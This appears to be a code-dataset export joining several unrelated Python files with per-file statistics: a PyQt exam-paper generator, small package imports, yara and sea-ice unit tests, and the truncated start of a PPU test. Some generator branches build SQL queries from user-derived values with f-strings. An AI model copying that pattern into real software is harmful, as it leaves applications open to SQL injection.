cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 4 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
self.val4 = paths[3]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':self.val3,
'question4':self.val4,
'question5':'',
'question6':''
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 5 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
self.val4 = paths[3]
self.val5 = paths[4]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':self.val3,
'question4':self.val4,
'question5':self.val5,
'question6':'',
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
elif len(paths) == 6 and self.typ == "Subjective":
self.val1 = paths[0]
self.val2 = paths[1]
self.val3 = paths[2]
self.val4 = paths[3]
self.val5 = paths[4]
self.val6 = paths[5]
dict_var = {'date':self.d,'time':self.t,'course code':self.cc,
'course title':self.ct,
'total marks':self.tm,
'exam type':self.et,
'semesteryear':self.Sy,
'estimated time':self.est,
'teachername':self.tn,
'instruction':self.ifs,
'question1':self.val1,
'question2':self.val2,
'question3':self.val3,
'question4':self.val4,
'question5':self.val5,
'question6':self.val6
}
file_path = os.path.join(os.getcwd(),"dot.dat")
with open(file_path,"w") as f:
for key in dict_var.keys():
print(key)
print(dict_var[key])
print('yes')
f.write(f"{key},{dict_var[key]}\n")
print('hogya')
try:
file = str(self.lineEdit_13.text())
file = file + '.tex'
try:
finalfile = open(file, 'x')
with open('dot.tex','r') as firstfile, open(file,'w') as secondfile:
for line in firstfile:
secondfile.write(line)
tex_filename = file
filename, ext = os.path.splitext(tex_filename)
pdf_filename = filename + '.pdf'
subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
path = pdf_filename
webbrowser.open_new(path)
conn = sqlite3.connect("Database.db")
cur = conn.cursor()
self.ema = str(self.label0.text())
cur.execute("CREATE TABLE IF NOT EXISTS AssessmentSub (PDFDOC TEXT NOT NULL, Subject TEXT NOT NULL, Email TEXT NOT NULL, FOREIGN KEY (Email) REFERENCES user (Email))")
cur.execute("INSERT INTO AssessmentSub (PDFDOC, Subject, Email) VALUES (?,?,?)", (path, self.sub, self.ema))
cur.execute(f"SELECT PDFDOC FROM AssessmentSub WHERE Email = '{self.ema}' AND Subject = '{self.sub}';")
result = cur.fetchall()
conn.commit()
conn.close()
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("Successfully Saved")
self.Dialog.setWindowTitle("Confimation Message!")
self.Dialog.show()
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.ui.label.setText("File with this name already exist")
self.Dialog.setWindowTitle("Alert!")
self.Dialog.show()
except Exception as e:
print(e)
except Exception as e:
self.Dialog = QtWidgets.QDialog()
self.ui = Ui_Email()
self.ui.setupUi(self.Dialog)
self.Dialog.setWindowTitle("Alert!")
self.ui.label.setText(e)
self.Dialog.show()
def generateD(self):
    """Compile the dashboard TeX source (dash.tex) to PDF and open it.

    Stores two values for the TeX document via ``save_var_latex``, runs
    ``pdflatex`` in non-stop mode on ``dash.tex``, then opens the
    resulting PDF in the system default viewer.

    Errors are reported to stdout only (best-effort; no dialog here).
    """
    try:
        save_var_latex("helo", 20)
        save_var_latex("total_score", 30)
        # TeX source filename; the PDF name is derived from it instead of
        # repeating the 'dash.pdf' literal (the original hard-coded both).
        tex_filename = 'dash.tex'
        filename, _ext = os.path.splitext(tex_filename)
        pdf_filename = filename + '.pdf'
        # List form (shell=False): no shell-injection risk from the filename.
        subprocess.run(['pdflatex', '-interaction=nonstopmode', tex_filename])
        webbrowser.open_new(pdf_filename)
    except Exception as e:
        # Broad catch kept deliberately: compilation is best-effort and a
        # failure here must not crash the GUI.
        print(e)
def getImageLabelSub(self, image):
    """Build a QLabel rendering *image* for use as a table-cell widget.

    Parameters
    ----------
    image : bytes-like
        Raw image blob read from the database; decoded here as PNG
        (the format the Subjective flow appears to store — TODO confirm).

    Returns
    -------
    QtWidgets.QLabel or None
        The populated label, or None if Qt raises while loading
        (mirrors the original best-effort behavior).
    """
    try:
        imagelabel = QtWidgets.QLabel(self.centralwidget)
        imagelabel.setText("")
        imagelabel.setScaledContents(True)  # stretch pixmap to the cell size
        pixmap = QtGui.QPixmap()
        # The original printed "error" unconditionally around every call;
        # that debug noise is removed — failures now surface via the except.
        pixmap.loadFromData(image, 'png')
        imagelabel.setPixmap(pixmap)
        return imagelabel
    except Exception as e:
        print(e)
def getImageLabelOb(self, image):
    """Build a QLabel rendering *image* for use as a table-cell widget.

    Parameters
    ----------
    image : bytes-like
        Raw image blob read from the database; decoded here as JPEG.
        NOTE(review): the Subjective counterpart decodes as 'png' —
        confirm the Objective flow really stores JPEG blobs.

    Returns
    -------
    QtWidgets.QLabel or None
        The populated label, or None if Qt raises while loading
        (mirrors the original best-effort behavior).
    """
    try:
        imagelabel = QtWidgets.QLabel(self.centralwidget)
        imagelabel.setText("")
        imagelabel.setScaledContents(True)  # stretch pixmap to the cell size
        pixmap = QtGui.QPixmap()
        # The original printed "error" unconditionally around every call;
        # that debug noise is removed — failures now surface via the except.
        pixmap.loadFromData(image, 'JPEG')
        imagelabel.setPixmap(pixmap)
        return imagelabel
    except Exception as e:
        print(e)
def fullfecth(self):
    """Fetch every stored question for the selected subject/type and
    render them into the table view.

    Reads the subject and question type from the two combo boxes and the
    user's email from ``label0``, then loads all ``(Question, QDes)``
    rows from the matching per-subject table.  Column 0 holds an image
    blob and is rendered with an image-label widget; other columns are
    shown as plain text.

    On a database error a dialog titled "Sqlite3 Error" is shown with
    the exception text, matching the original behavior.  An unrecognized
    subject/type combination silently does nothing (as before).
    """
    # Whitelist mapping (subject, type) -> (table name, subjective flag).
    # Keeping the table name out of user-controlled strings, and using a
    # parameterized query for the email, removes the SQL-injection risk
    # the original f-string queries had.
    table_map = {
        ('Calculus', 'Subjective'): ('CalculusSub', True),
        ('Calculus', 'Objective'): ('CalculusOb', False),
        ('Probability', 'Subjective'): ('ProbabilitySub', True),
        ('Probability', 'Objective'): ('ProbabilityOb', False),
        ('Linear Algebra', 'Subjective'): ('LinearSub', True),
        ('Linear Algebra', 'Objective'): ('LinearOb', False),
    }
    self.sub = self.comboBox.currentText()
    self.typ = self.comboBox_2.currentText()
    self.email = self.label0.text()
    entry = table_map.get((self.sub, self.typ))
    if entry is None:
        return  # unknown combination: original code silently did nothing
    table, subjective = entry
    self._set_header_labels(self.sub, self.typ)
    conn = sqlite3.connect("Database.db")
    cur = conn.cursor()
    try:
        # Email bound as a parameter — never interpolated into the SQL.
        cur.execute(
            "SELECT Question, QDes FROM " + table + " WHERE Email = ?;",
            (self.email,),
        )
        result = cur.fetchall()
        print(result)
        self._fill_table(result, subjective)
        conn.commit()
    except Exception as e:
        self.Dialog = QtWidgets.QDialog()
        self.ui = Ui_Email()
        self.ui.setupUi(self.Dialog)
        self.ui.label.setText(str(e))
        self.Dialog.setWindowTitle("Sqlite3 Error")
        self.Dialog.show()
    finally:
        # Always release the connection (the original leaked it when the
        # query raised).
        conn.close()

def _set_header_labels(self, subject, qtype):
    """Show the current subject and question type in the header labels."""
    style = "font: 14pt \"Arial\";\ncolor: rgb(2, 114, 118);\n"
    self.TitleS.setText(subject)
    self.TitleS.setStyleSheet(style)
    self.TypeS.setText(qtype)
    self.TypeS.setStyleSheet(style)

def _fill_table(self, rows, subjective):
    """Populate ``tableView`` with (image-blob, description, ...) rows.

    Column 0 is rendered as an image widget; remaining columns as text
    items.  *subjective* selects between the PNG (Subjective) and JPEG
    (Objective) image loaders.
    """
    loader = self.getImageLabelSub if subjective else self.getImageLabelOb
    self.tableView.setRowCount(0)
    for row_number, row_data in enumerate(rows):
        self.tableView.insertRow(row_number)
        for column_number, data in enumerate(row_data):
            if column_number == 0:
                self.tableView.setCellWidget(
                    row_number, column_number, loader(data))
            else:
                self.tableView.setItem(
                    row_number, column_number,
                    QtWidgets.QTableWidgetItem(str(data)))
def viewRandomly(self):
    """Fetch a random sample of questions for the selected subject/type.

    Reads the question count (``lineEdit``), subject (``comboBox``),
    question type (``comboBox_2``) and instructor email (``label0``),
    then pulls that many random rows from the matching table in
    ``Database.db`` and renders them into ``tableView`` (column 0 as an
    image widget, remaining columns as plain text items).

    On any database or input error, an ``Ui_Email`` dialog titled
    "Sqlite3 Error" is shown with the exception text.
    """
    self.no = self.lineEdit.text()
    self.sub = self.comboBox.currentText()
    self.typ = self.comboBox_2.currentText()
    self.email = self.label0.text()

    # Whitelist mapping (subject, type) -> table name.  The table name is
    # interpolated only from this fixed dict, and all values are bound as
    # parameters, so no user input ever reaches the SQL text (prevents
    # the SQL injection present in the original f-string queries).
    tables = {
        ('Calculus', 'Subjective'): 'CalculusSub',
        ('Calculus', 'Objective'): 'CalculusOb',
        ('Probability', 'Subjective'): 'ProbabilitySub',
        ('Probability', 'Objective'): 'ProbabilityOb',
        ('Linear Algebra', 'Subjective'): 'LinearSub',
        ('Linear Algebra', 'Objective'): 'LinearOb',
    }
    table = tables.get((self.sub, self.typ))
    if table is None:
        # Unknown combination: the original code silently did nothing.
        return

    # Both header labels share one stylesheet; text mirrors the selection.
    style = "font: 14pt \"Arial\";\ncolor: rgb(2, 114, 118);\n"
    self.TitleS.setText(self.sub)
    self.TitleS.setStyleSheet(style)
    self.TypeS.setText(self.typ)
    self.TypeS.setStyleSheet(style)

    # Column 0 renders the question as an image; the helper differs by type.
    image_label = (self.getImageLabelSub if self.typ == 'Subjective'
                   else self.getImageLabelOb)

    conn = sqlite3.connect("Database.db")
    cur = conn.cursor()
    try:
        # int() inside the try so a non-numeric count surfaces in the
        # same error dialog as database failures.
        limit = int(self.no)
        cur.execute(
            f"SELECT Question, QDes FROM {table} "
            "WHERE Email = ? ORDER BY Random() LIMIT ?",
            (self.email, limit))
        result = cur.fetchall()
        self.tableView.setRowCount(0)
        for row_number, row_data in enumerate(result):
            self.tableView.insertRow(row_number)
            for column_number, data in enumerate(row_data):
                if column_number == 0:
                    self.tableView.setCellWidget(
                        row_number, column_number, image_label(data))
                else:
                    self.tableView.setItem(
                        row_number, column_number,
                        QtWidgets.QTableWidgetItem(str(data)))
        # SELECT needs no commit; the original commit calls were no-ops.
    except Exception as e:
        # Reuse the Ui_Email dialog layout to report the error, as the
        # original branches did.
        self.Dialog = QtWidgets.QDialog()
        self.ui = Ui_Email()
        self.ui.setupUi(self.Dialog)
        self.ui.label.setText(str(e))
        self.Dialog.setWindowTitle("Sqlite3 Error")
        self.Dialog.show()
    finally:
        # Always release the connection (the original leaked it on most
        # branches, where conn.close() was commented out).
        conn.close()
def retranslateUi(self, MainWindow):
    """Install the (translatable) captions for every widget of the
    New Assessment window."""
    _translate = QtCore.QCoreApplication.translate
    MainWindow.setWindowTitle(_translate("MainWindow", "New Assessment"))
    MainWindow.setWindowIcon(QIcon("Splashlogo.png"))
    # Widget/caption pairs, applied in one pass below.
    captions = (
        (self.label, "Select Subject"),
        (self.label_2, "Select Question Type"),
        (self.label_3, "Enter No of Questions"),
        (self.label_4, "Instructor Name"),
        (self.label_5, "Date"),
        (self.label_6, "Time"),
        (self.label_8, "Course Code"),
        (self.label_9, "Course Title"),
        (self.label_10, "Total Marks"),
        (self.label_11, "Enter Examination Type"),
        (self.label_12, "Semester Type with Year"),
        (self.label_13, "Estimated Time"),
        (self.label_14, "Instruction for Students"),
        (self.label_15, "PDF Name"),
        (self.TitleS, "Linear Algebra"),
        (self.TypeS, "Subjective"),
        (self.Ques, "Questions"),
        (self.RandomSearch, "Randomly Fetch"),
        (self.GenerateDoc, "Generate Assessment Save"),
        (self.AllFetch, "ALL Fetch"),
    )
    for widget, caption in captions:
        widget.setText(_translate("MainWindow", caption))
if __name__ == "__main__":
    # Standalone entry point: build and show the New Assessment window.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_NewAssessment()
    ui.setupUi(MainWindow)
    MainWindow.show()
    # exec_() blocks until the window is closed; its exit status is
    # forwarded to the interpreter via sys.exit().
    sys.exit(app.exec_())
| 48.359731
| 195
| 0.475442
| 9,104
| 93,431
| 4.820299
| 0.04866
| 0.034637
| 0.012442
| 0.016407
| 0.840101
| 0.817701
| 0.774565
| 0.770463
| 0.762556
| 0.761234
| 0
| 0.031885
| 0.399803
| 93,431
| 1,931
| 196
| 48.384775
| 0.750682
| 0.022316
| 0
| 0.814354
| 0
| 0.024911
| 0.191002
| 0.017794
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004745
| false
| 0
| 0.008897
| 0
| 0.015421
| 0.072361
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f1148f03a43edc5e6c16cf40f680a9c24e05ec19
| 141
|
py
|
Python
|
cfpq_data/grammars/readwrite/__init__.py
|
viabzalov/CFPQ_Data
|
67239c876897d04ba2f4ef88a75fd4a38a494efa
|
[
"Apache-2.0"
] | 8
|
2020-03-30T17:47:31.000Z
|
2022-01-27T13:36:39.000Z
|
cfpq_data/grammars/readwrite/__init__.py
|
viabzalov/CFPQ_Data
|
67239c876897d04ba2f4ef88a75fd4a38a494efa
|
[
"Apache-2.0"
] | 27
|
2019-10-21T09:31:08.000Z
|
2021-11-07T03:19:15.000Z
|
cfpq_data/grammars/readwrite/__init__.py
|
viabzalov/CFPQ_Data
|
67239c876897d04ba2f4ef88a75fd4a38a494efa
|
[
"Apache-2.0"
] | 14
|
2019-10-18T12:49:47.000Z
|
2021-08-03T14:20:17.000Z
|
from cfpq_data.grammars.readwrite.cfg import *
from cfpq_data.grammars.readwrite.cnf import *
from cfpq_data.grammars.readwrite.rsm import *
| 35.25
| 46
| 0.829787
| 21
| 141
| 5.428571
| 0.428571
| 0.210526
| 0.315789
| 0.526316
| 0.868421
| 0.614035
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 141
| 3
| 47
| 47
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
f115b2964c42b393b769510c1dd8502827d68bde
| 64
|
py
|
Python
|
features/__main__.py
|
ririw/kaggle-bimbo-pymc3
|
fbf016751e2459b9fa6c8d058aad9c75fca57731
|
[
"MIT"
] | null | null | null |
features/__main__.py
|
ririw/kaggle-bimbo-pymc3
|
fbf016751e2459b9fa6c8d058aad9c75fca57731
|
[
"MIT"
] | null | null | null |
features/__main__.py
|
ririw/kaggle-bimbo-pymc3
|
fbf016751e2459b9fa6c8d058aad9c75fca57731
|
[
"MIT"
] | null | null | null |
# Entry point for `python -m features`: build a single training batch and
# print it as a quick sanity check of the feature pipeline.
from features import make_train_batch
print(make_train_batch())
| 21.333333
| 37
| 0.859375
| 10
| 64
| 5.1
| 0.7
| 0.352941
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078125
| 64
| 3
| 38
| 21.333333
| 0.864407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
f1199784f7eb9fbe66e86d8f2fce81be0ae1045b
| 259
|
py
|
Python
|
tests/test_yara.py
|
BA7JCM/RATDecoders
|
d675ba1c06e6dd8365149c9ee8a8db1a6e5e508e
|
[
"MIT"
] | 905
|
2015-01-16T23:56:49.000Z
|
2022-03-28T14:00:58.000Z
|
tests/test_yara.py
|
BA7JCM/RATDecoders
|
d675ba1c06e6dd8365149c9ee8a8db1a6e5e508e
|
[
"MIT"
] | 38
|
2015-01-26T08:46:50.000Z
|
2021-05-23T03:24:44.000Z
|
tests/test_yara.py
|
BA7JCM/RATDecoders
|
d675ba1c06e6dd8365149c9ee8a8db1a6e5e508e
|
[
"MIT"
] | 319
|
2015-01-09T21:18:26.000Z
|
2022-03-10T01:41:53.000Z
|
# Just a simple compile
# Smoke tests: confirm that yara-python can compile rules importing the
# "pe" and "dotnet" modules (i.e. libyara was built with those modules).
import yara


def test_yara_pe():
    # yara.compile raises if the "pe" module is unavailable.
    yara.compile(source='import "pe" rule a { condition: false }')


def test_yara_dotnet():
    # yara.compile raises if the "dotnet" module is unavailable.
    yara.compile(source='import "dotnet" rule a { condition: false }')


def test_yara_compile():
    # Placeholder; plain compilation is already exercised above.
    pass
| 17.266667
| 70
| 0.687259
| 37
| 259
| 4.648649
| 0.405405
| 0.122093
| 0.19186
| 0.267442
| 0.348837
| 0.348837
| 0.348837
| 0
| 0
| 0
| 0
| 0
| 0.189189
| 259
| 14
| 71
| 18.5
| 0.819048
| 0.081081
| 0
| 0
| 0
| 0
| 0.353448
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| true
| 0.142857
| 0.428571
| 0
| 0.857143
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
2d01b8faa65abcee85528f546719f85e843e20ba
| 6,553
|
py
|
Python
|
seaice/tools/plotter/test/test_monthly_extent.py
|
andypbarrett/nsidc-seaice
|
167a16309f7eaadd5c613b54a7df26eb1f48c2f3
|
[
"MIT"
] | 2
|
2020-08-27T08:40:22.000Z
|
2021-04-14T15:42:09.000Z
|
seaice/tools/plotter/test/test_monthly_extent.py
|
andypbarrett/nsidc-seaice
|
167a16309f7eaadd5c613b54a7df26eb1f48c2f3
|
[
"MIT"
] | null | null | null |
seaice/tools/plotter/test/test_monthly_extent.py
|
andypbarrett/nsidc-seaice
|
167a16309f7eaadd5c613b54a7df26eb1f48c2f3
|
[
"MIT"
] | null | null | null |
import unittest
import numpy as np
import pandas as pd
import seaice.tools.plotter.monthly_extent as plt
class Test_MissingAnchorPoints(unittest.TestCase):
    """Tests for ``plt._missing_boundaries``.

    The function is expected to return ``[start, end]`` index pairs that
    bracket each run of missing (NaN) values in a series, where *start*
    and *end* are the indices of the valid data points adjacent to the
    gap.
    """

    # Year index 1979.0 .. 2014.0 — identical in every test case, so it is
    # defined once instead of being copy-pasted into each method.
    YEARS = np.arange(1979., 2015.)

    def test_gets_indices_of_data_adjacent_to_missing_data(self):
        """Gaps at indices 10 and 21-22 are bracketed by [9,11], [20,23]."""
        x = self.YEARS
        y = np.ma.array([15.46, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
                         15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
                         15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
                         np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
                         13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, 14.14])
        df = pd.DataFrame({'data': y, 'year': x}, index=x)
        actual = plt._missing_boundaries(df.data)
        expected = [[9, 11], [20, 23]]
        self.assertEqual(actual, expected)

    def test_with_no_missing_data(self):
        """A complete series yields no boundary pairs."""
        x = self.YEARS
        y = np.ma.array([15.46, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
                         15.15, 15.33, 15.21, 14.44, 14.68, 14.93, 14.7,
                         15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
                         14.63, 14.86, 14.37, 14.57, 14.11, 14.07, 13.97,
                         13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, 14.14])
        # NOTE: this case deliberately builds the frame without a 'year'
        # column, matching the original test.
        df = pd.DataFrame({'data': y}, index=x)
        actual = plt._missing_boundaries(df.data)
        expected = []
        self.assertEqual(actual, expected)

    def test_with_missing_data_at_end(self):
        """A trailing NaN (no data after it) produces no extra pair."""
        x = self.YEARS
        y = np.ma.array([15.46, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
                         15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
                         15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
                         np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
                         13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, np.nan])
        self.assertEqual(len(x), len(y))
        df = pd.DataFrame({'data': y, 'year': x}, index=x)
        actual = plt._missing_boundaries(df.data)
        expected = [[9, 11], [20, 23]]
        self.assertEqual(actual, expected)

    def test_with_missing_data_almost_at_end(self):
        """A NaN one position before the end is bracketed normally."""
        x = self.YEARS
        y = np.ma.array([15.46, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
                         15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
                         15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
                         np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
                         13.87, 14.42, 14.57, 14.7, 14.16, 14.72, np.nan, 14.36])
        df = pd.DataFrame({'data': y, 'year': x}, index=x)
        actual = plt._missing_boundaries(df.data)
        expected = [[9, 11], [20, 23], [33, 35]]
        self.assertEqual(actual, expected)

    def test_with_missing_data_at_beginning(self):
        """A leading NaN (no data before it) produces no extra pair."""
        x = self.YEARS
        y = np.ma.array([np.nan, 15.49, 15.12, 15.57, 15.3, 15.15, 15.34,
                         15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
                         15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
                         np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
                         13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, 15.46])
        self.assertEqual(len(x), len(y))
        df = pd.DataFrame({'data': y, 'year': x}, index=x)
        actual = plt._missing_boundaries(df.data)
        expected = [[9, 11], [20, 23]]
        self.assertEqual(actual, expected)

    def test_with_missing_data_almost_at_beginning(self):
        """A NaN at index 1 is bracketed by [0, 2]."""
        x = self.YEARS
        y = np.ma.array([15.49, np.nan, 15.12, 15.57, 15.3, 15.15, 15.34,
                         15.15, 15.33, 15.21, np.nan, 14.68, 14.93, 14.7,
                         15.18, 14.95, 14.59, 14.22, 14.59, 14.89, 15.13,
                         np.nan, np.nan, 14.37, 14.57, 14.11, 14.07, 13.97,
                         13.87, 14.42, 14.57, 14.7, 14.16, 14.72, 14.36, 15.46])
        self.assertEqual(len(x), len(y))
        df = pd.DataFrame({'data': y, 'year': x}, index=x)
        actual = plt._missing_boundaries(df.data)
        expected = [[0, 2], [9, 11], [20, 23]]
        self.assertEqual(actual, expected)
| 46.475177
| 88
| 0.447734
| 925
| 6,553
| 3.12
| 0.128649
| 0.033264
| 0.024948
| 0.024948
| 0.926888
| 0.926888
| 0.926888
| 0.926888
| 0.914414
| 0.898475
| 0
| 0.407146
| 0.372196
| 6,553
| 140
| 89
| 46.807143
| 0.294361
| 0
| 0
| 0.785714
| 0
| 0
| 0.006714
| 0
| 0
| 0
| 0
| 0
| 0.091837
| 1
| 0.061224
| false
| 0
| 0.040816
| 0
| 0.112245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2d46e2b1310c147d85ecf41a0b56fa86f3a1ad4b
| 2,371
|
py
|
Python
|
pynes/tests/ppu_test.py
|
timgates42/pyNES
|
e385c7189eca44b9a9e0e781b28c8562e0647b0b
|
[
"BSD-3-Clause"
] | 1,046
|
2015-02-10T02:23:58.000Z
|
2022-03-16T02:42:02.000Z
|
pynes/tests/ppu_test.py
|
mcanthony/pyNES
|
5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b
|
[
"BSD-3-Clause"
] | 30
|
2015-02-11T15:21:10.000Z
|
2022-03-11T23:12:26.000Z
|
pynes/tests/ppu_test.py
|
mcanthony/pyNES
|
5f6078c02ae1fe9c6fecb4a8490f82f8c721cf3b
|
[
"BSD-3-Clause"
] | 132
|
2015-05-28T14:55:04.000Z
|
2021-12-09T18:58:45.000Z
|
import unittest
from pynes.game import PPU
class PPUTest(unittest.TestCase):
    """Unit tests for the PPU register model.

    Each property setter is expected to flip a specific bit in the
    ``ctrl`` or ``mask`` register; the expected register values below
    come from the original assertions.

    Fix: ``assertEquals`` is a long-deprecated alias removed in
